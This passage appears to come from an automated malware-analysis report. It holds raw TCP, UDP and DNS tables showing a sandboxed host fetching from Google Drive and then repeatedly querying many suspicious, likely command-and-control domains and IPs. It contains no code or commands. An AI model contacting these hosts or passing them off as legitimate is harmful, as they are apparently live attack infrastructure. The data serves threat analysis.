                                                                                                                                                                                Aug 23, 2023 09:34:09.363615990 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363646030 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363675117 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363739014 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363766909 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363821983 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363893986 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363950014 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363965034 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364042044 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364056110 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364120960 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364146948 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364209890 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364211082 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364280939 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364314079 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364341974 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364363909 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364418983 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364444017 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364490032 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364510059 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364566088 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364646912 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364705086 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364726067 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364795923 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364826918 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.364854097 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.364883900 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365030050 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365056038 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365132093 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365195036 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365197897 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365262985 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365289927 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365329027 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365379095 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365387917 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365431070 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365458965 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365494967 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365540028 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365546942 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365612984 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365629911 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365691900 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365746975 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365748882 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365801096 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365842104 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365873098 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.365900040 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.365936041 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.366007090 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.366015911 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.366116047 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.366223097 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.366424084 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.366496086 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.366576910 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.366652012 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:50.015201092 CEST4994380192.168.11.20154.205.111.163
                                                                                                                                                                                Aug 23, 2023 09:34:50.183443069 CEST8049943154.205.111.163192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:50.183717012 CEST4994380192.168.11.20154.205.111.163
                                                                                                                                                                                Aug 23, 2023 09:34:50.183717966 CEST4994380192.168.11.20154.205.111.163
                                                                                                                                                                                Aug 23, 2023 09:34:50.355051994 CEST8049943154.205.111.163192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:50.355128050 CEST8049943154.205.111.163192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:50.355180025 CEST8049943154.205.111.163192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:50.355519056 CEST4994380192.168.11.20154.205.111.163
                                                                                                                                                                                Aug 23, 2023 09:34:50.355519056 CEST4994380192.168.11.20154.205.111.163
                                                                                                                                                                                Aug 23, 2023 09:34:50.523467064 CEST8049943154.205.111.163192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:30.574028969 CEST4994480192.168.11.20150.95.255.38
                                                                                                                                                                                Aug 23, 2023 09:35:30.833108902 CEST8049944150.95.255.38192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:30.833328009 CEST4994480192.168.11.20150.95.255.38
                                                                                                                                                                                Aug 23, 2023 09:35:30.833388090 CEST4994480192.168.11.20150.95.255.38
                                                                                                                                                                                Aug 23, 2023 09:35:31.092463017 CEST8049944150.95.255.38192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:31.092535973 CEST8049944150.95.255.38192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:31.092585087 CEST8049944150.95.255.38192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:31.092940092 CEST4994480192.168.11.20150.95.255.38
                                                                                                                                                                                Aug 23, 2023 09:35:31.092940092 CEST4994480192.168.11.20150.95.255.38
                                                                                                                                                                                Aug 23, 2023 09:35:31.352117062 CEST8049944150.95.255.38192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:51.261188030 CEST4994580192.168.11.20203.161.56.237
                                                                                                                                                                                Aug 23, 2023 09:35:51.426650047 CEST8049945203.161.56.237192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:51.426824093 CEST4994580192.168.11.20203.161.56.237
                                                                                                                                                                                Aug 23, 2023 09:35:51.426848888 CEST4994580192.168.11.20203.161.56.237
                                                                                                                                                                                Aug 23, 2023 09:35:51.592504025 CEST8049945203.161.56.237192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:51.661720991 CEST8049945203.161.56.237192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:51.662106037 CEST8049945203.161.56.237192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:51.662122965 CEST4994580192.168.11.20203.161.56.237
                                                                                                                                                                                Aug 23, 2023 09:35:51.662220955 CEST4994580192.168.11.20203.161.56.237
                                                                                                                                                                                Aug 23, 2023 09:35:51.828114986 CEST8049945203.161.56.237192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:12.290286064 CEST4994680192.168.11.2018.225.33.210
                                                                                                                                                                                Aug 23, 2023 09:36:12.408256054 CEST804994618.225.33.210192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:12.408483982 CEST4994680192.168.11.2018.225.33.210
                                                                                                                                                                                Aug 23, 2023 09:36:12.408483982 CEST4994680192.168.11.2018.225.33.210
                                                                                                                                                                                Aug 23, 2023 09:36:12.526463032 CEST804994618.225.33.210192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:12.566406965 CEST804994618.225.33.210192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:12.566471100 CEST804994618.225.33.210192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:12.566787004 CEST4994680192.168.11.2018.225.33.210
                                                                                                                                                                                Aug 23, 2023 09:36:12.566787004 CEST4994680192.168.11.2018.225.33.210
                                                                                                                                                                                Aug 23, 2023 09:36:12.684624910 CEST804994618.225.33.210192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:32.731961012 CEST4994780192.168.11.2092.205.50.73
                                                                                                                                                                                Aug 23, 2023 09:36:32.743649006 CEST804994792.205.50.73192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:32.743917942 CEST4994780192.168.11.2092.205.50.73
                                                                                                                                                                                Aug 23, 2023 09:36:32.743917942 CEST4994780192.168.11.2092.205.50.73
                                                                                                                                                                                Aug 23, 2023 09:36:32.755480051 CEST804994792.205.50.73192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:32.761950970 CEST804994792.205.50.73192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:32.762299061 CEST4994780192.168.11.2092.205.50.73
                                                                                                                                                                                Aug 23, 2023 09:36:32.762299061 CEST4994780192.168.11.2092.205.50.73
                                                                                                                                                                                Aug 23, 2023 09:36:32.773859024 CEST804994792.205.50.73192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.924052954 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.935286045 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.935461044 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.935537100 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.977883101 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.977973938 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978049040 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978121042 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978177071 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978231907 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978307009 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978369951 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978429079 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.978439093 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978514910 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.978631020 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.978827000 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.978929996 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.989586115 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.989659071 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.989717007 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.989770889 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.989825964 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.989881039 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.989937067 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.989993095 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.990017891 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.990046978 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.990071058 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.990093946 CEST804994891.195.240.123192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.990629911 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:52.990629911 CEST4994880192.168.11.2091.195.240.123
                                                                                                                                                                                Aug 23, 2023 09:36:53.001581907 CEST804994891.195.240.123192.168.11.20

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Aug 23, 2023 09:28:57.920428038 CEST5275753192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:28:57.929977894 CEST53527571.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:58.595691919 CEST5380753192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:28:58.626997948 CEST53538071.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:29:42.528835058 CEST5593153192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST53559311.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:03.053678989 CEST5120853192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:30:03.604263067 CEST53512081.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:23.751600027 CEST5527753192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:30:23.768559933 CEST53552771.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:44.435029984 CEST5543453192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:30:44.531163931 CEST53554341.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:04.820693016 CEST6463253192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:31:04.836565971 CEST53646321.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:25.113137960 CEST6365853192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:31:25.557508945 CEST53636581.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:44.593322039 CEST5409353192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:31:44.611885071 CEST53540931.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:04.760761976 CEST4946553192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:32:04.772378922 CEST53494651.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:26.927791119 CEST5905953192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:32:26.944454908 CEST53590591.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:47.204785109 CEST5012953192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:32:47.253495932 CEST53501291.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:33:27.602188110 CEST5468853192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:33:28.078979015 CEST53546881.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:33:48.269479036 CEST5910053192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:33:48.822376013 CEST53591001.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:08.968122005 CEST5521153192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:34:09.074830055 CEST53552111.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:29.447969913 CEST5728653192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:34:29.483954906 CEST53572861.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:49.631135941 CEST6299753192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:34:50.014394999 CEST53629971.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:11.657521009 CEST5443853192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:35:11.671346903 CEST53544381.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:29.794145107 CEST5333253192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:35:30.573162079 CEST53533321.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:35:51.242656946 CEST5554553192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:35:51.260600090 CEST53555451.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:11.800591946 CEST5111553192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:36:12.289516926 CEST53511151.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:32.717871904 CEST5759453192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:36:32.731327057 CEST53575941.1.1.1192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:36:52.901110888 CEST5095553192.168.11.201.1.1.1
                                                                                                                                                                                Aug 23, 2023 09:36:52.923471928 CEST53509551.1.1.1192.168.11.20

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Aug 23, 2023 09:28:57.920428038 CEST192.168.11.201.1.1.10x6f20Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:28:58.595691919 CEST192.168.11.201.1.1.10xb519Standard query (0)doc-14-bk-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.528835058 CEST192.168.11.201.1.1.10x577dStandard query (0)www.aitechscope.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:03.053678989 CEST192.168.11.201.1.1.10x9feeStandard query (0)www.gewep.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:23.751600027 CEST192.168.11.201.1.1.10x2219Standard query (0)www.telefonino.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:44.435029984 CEST192.168.11.201.1.1.10x40d3Standard query (0)www.zentrimax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:31:04.820693016 CEST192.168.11.201.1.1.10x8eb0Standard query (0)www.luckymotherclucker.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:31:25.113137960 CEST192.168.11.201.1.1.10x1f09Standard query (0)www.nrodwukb.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:31:44.593322039 CEST192.168.11.201.1.1.10xa299Standard query (0)www.deyuming.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:32:04.760761976 CEST192.168.11.201.1.1.10x72eaStandard query (0)www.7sdide.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:32:26.927791119 CEST192.168.11.201.1.1.10x7cacStandard query (0)www.ballbucketssalesstore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:32:47.204785109 CEST192.168.11.201.1.1.10xd91Standard query (0)www.pingpongtable-sg.bondA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:33:27.602188110 CEST192.168.11.201.1.1.10xbc94Standard query (0)www.shebyoaksmovie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:33:48.269479036 CEST192.168.11.201.1.1.10x6bbeStandard query (0)www.kmxbcx.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:34:08.968122005 CEST192.168.11.201.1.1.10xf99aStandard query (0)www.mtotem.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:34:29.447969913 CEST192.168.11.201.1.1.10xd354Standard query (0)www.visionaryglobalconsulting.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:34:49.631135941 CEST192.168.11.201.1.1.10xa281Standard query (0)www.ddh979.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:35:11.657521009 CEST192.168.11.201.1.1.10x3633Standard query (0)www.cryptor.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:35:29.794145107 CEST192.168.11.201.1.1.10x82ddStandard query (0)www.sfaiqhwxebvtre.netA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:35:51.242656946 CEST192.168.11.201.1.1.10xcb04Standard query (0)www.rtuakl.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:36:11.800591946 CEST192.168.11.201.1.1.10xc654Standard query (0)www.r5fesgy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:36:32.717871904 CEST192.168.11.201.1.1.10x7023Standard query (0)www.lido.systemsA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:36:52.901110888 CEST192.168.11.201.1.1.10x43faStandard query (0)www.ngbjf.cyouA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Aug 23, 2023 09:28:57.929977894 CEST1.1.1.1192.168.11.200x6f20No error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:28:58.626997948 CEST1.1.1.1192.168.11.200xb519No error (0)doc-14-bk-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:28:58.626997948 CEST1.1.1.1192.168.11.200xb519No error (0)googlehosted.l.googleusercontent.com172.217.18.97A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)www.aitechscope.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:29:42.546276093 CEST1.1.1.1192.168.11.200x577dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:03.604263067 CEST1.1.1.1192.168.11.200x9feeName error (3)www.gewep.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:23.768559933 CEST1.1.1.1192.168.11.200x2219No error (0)www.telefonino.shop104.21.6.57A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:23.768559933 CEST1.1.1.1192.168.11.200x2219No error (0)www.telefonino.shop172.67.154.247A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:44.531163931 CEST1.1.1.1192.168.11.200x40d3No error (0)www.zentrimax.comzentrimax.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:30:44.531163931 CEST1.1.1.1192.168.11.200x40d3No error (0)zentrimax.com85.10.194.228A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:31:04.836565971 CEST1.1.1.1192.168.11.200x8eb0No error (0)www.luckymotherclucker.comluckymotherclucker.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:31:04.836565971 CEST1.1.1.1192.168.11.200x8eb0No error (0)luckymotherclucker.com34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:31:25.557508945 CEST1.1.1.1192.168.11.200x1f09No error (0)www.nrodwukb.click43.154.67.170A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:31:44.611885071 CEST1.1.1.1192.168.11.200xa299Name error (3)www.deyuming.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:32:04.772378922 CEST1.1.1.1192.168.11.200x72eaName error (3)www.7sdide.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:32:26.944454908 CEST1.1.1.1192.168.11.200x7cacNo error (0)www.ballbucketssalesstore.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:32:26.944454908 CEST1.1.1.1192.168.11.200x7cacNo error (0)www.ballbucketssalesstore.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:32:47.253495932 CEST1.1.1.1192.168.11.200xd91No error (0)www.pingpongtable-sg.bond185.53.179.91A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:33:28.078979015 CEST1.1.1.1192.168.11.200xbc94No error (0)www.shebyoaksmovie.com342284.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:33:28.078979015 CEST1.1.1.1192.168.11.200xbc94No error (0)342284.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:33:28.078979015 CEST1.1.1.1192.168.11.200xbc94No error (0)342284.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:33:48.822376013 CEST1.1.1.1192.168.11.200x6bbeName error (3)www.kmxbcx.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:34:09.074830055 CEST1.1.1.1192.168.11.200xf99aNo error (0)www.mtotem.online31.31.198.61A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:34:29.483954906 CEST1.1.1.1192.168.11.200xd354Name error (3)www.visionaryglobalconsulting.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:34:50.014394999 CEST1.1.1.1192.168.11.200xa281No error (0)www.ddh979.com154.205.111.163A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:35:11.671346903 CEST1.1.1.1192.168.11.200x3633Name error (3)www.cryptor.storenonenoneA (IP address)IN (0x0001)false
